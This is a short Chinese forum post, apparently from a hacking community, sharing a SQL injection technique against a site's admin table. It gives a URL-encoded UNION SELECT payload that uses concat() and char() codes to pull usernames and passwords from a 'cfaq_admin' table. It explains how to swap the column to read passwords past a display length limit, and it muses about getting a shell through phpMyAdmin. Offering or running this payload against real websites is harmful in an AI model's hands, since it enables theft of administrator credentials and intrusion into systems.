测试过了 效果还行 不过不知道杂拿SHELL

后台好简陋喔...不过要是运气好能和phpmyadmin配合估计有戏看

发现这个注入方法挺新颖的~

union%20select%20concat(char(85),char(115),char(101),char(114),char(11
0),char(97),char(109),char(101),char(58),username,char(32),char(124),char(124),char(32),char(
80),char(97),char(115),char(115),char(119),char(111),char(114),char(100),char(58),password),2
%20from%20cfaq_admin%20where%20accesslevel%20like%201/*

union select concat(自己构造在页面上的东东)

例如: 

以上的char....就是username:表名(username)||password=:表名(password)

因为上面的那个显示栏目的地方有字符显示限制所以password没看到

可以把username那里改成password表名 就能读取到密码了~

嘿嘿~继续研究下